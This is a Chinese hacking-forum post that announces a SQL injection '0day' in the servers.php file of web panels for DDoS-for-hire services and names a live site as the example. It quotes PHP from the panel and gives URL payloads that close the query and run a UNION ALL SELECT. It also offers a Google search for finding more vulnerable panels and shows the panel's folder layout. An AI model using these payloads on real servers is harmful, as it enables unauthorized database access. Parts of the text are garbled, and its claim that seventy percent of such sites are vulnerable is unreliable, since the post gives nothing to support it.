Jump to content
This Wind

DDOS页端的常见SQL注入漏洞算是0day了。

Recommended Posts

安全

一个小洞洞,不喜欢写很多废话,下面的描述也是。

小介绍

无意中在谷歌ge上搜索到了提供在线DDOS攻击的站点,感觉好好奇哦,这玩意是不是可以改变世界?

网址:http : //www.ddos.rip/

这里是测评介绍,感觉挺丰富且价格也不是很贵,然后对于我们这些搬砖的攻城狮而言,花钱是不可能的,一定是不可能的!

过程

$SQLCheckLost = $odb -> prepare("SELECT COUNT(*) FROM `users` WHERE `username` = :username AND `email` = :mail AND `scode` = :scode "); $SQLCheckLost -> execute(array(':username' => $username, ':mail' => $mail, ':scode' => $scode)); $countLost = $SQLCheckLost -> fetchColumn(0); if ($countLost > 0) { function generarCodigo($longitud) { $key = ''; $pattern = '1234567890abcdefghijklmnopqrstuvwxyz'; $max = strlen($pattern)-1; for($i=0;$i < $longitud;$i++) $key .= $pattern{mt_rand(0,$max)}; return $key; }

几乎所有的文件都是通过预进行SQL传递,这玩意跟注入一直就是死对头,但是在SERVERS.PHP这玩意中没有顾忌到,虽然也是预先,但是并没有通过赋值操作。

有效载荷

server.php?sv=A1%%23' 将SQL语句闭合,然后你们懂的。 /ajax/servers.php?sv=A1%%27%20UNION%20ALL%20SELECT%20user()%23-- Next You K

影响

这样说吧,百分之七十的DDOS在线攻击网站都存在... g谷歌搜索:https : //www.google.com/search? ei=IO0NXaHYIIzdvgT2vq3ABg&q=ddos%E7%BD%91 %E9%A1%B5%E7%AB%AF&oq = ddos%E7%BD%91%E9%A1%B5%E7%AB%AF&gs_l = psy-ab.12 ... 853628.857136..858562 ... 0.0。 .0.1153.1153.7-1 ... 0 .... 1..gws-wiz.XQGEBD9xDU0

结构

├─@ ├─admin ├─ajax │ ├─Crypt │ ├─File │ ├─js │ ├─Math │ └─Net ├─apikey ├─assets │ ├─images │ └─user │ ├─css │ ├─fonts │ └─js ├─css ├─fonts ├─images ├─js ├─picture └─user

这种垃圾的架构我也是醉了,虽然我不会ThinkPhp审计...... @文件夹主要是Config文件以及各种各样的文件文件admin就不说了,此文件夹下也存在着相同的破坏,但是对于黑盒而言,此突破是不存在的,因为TMD的后台根本就不会让你找到ajax主要以usercp为主,以及前台登录的登录,以及服务器apikey通过预先获取命令然后通过api向发包机发送指令下面几个文件夹可以无视

Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines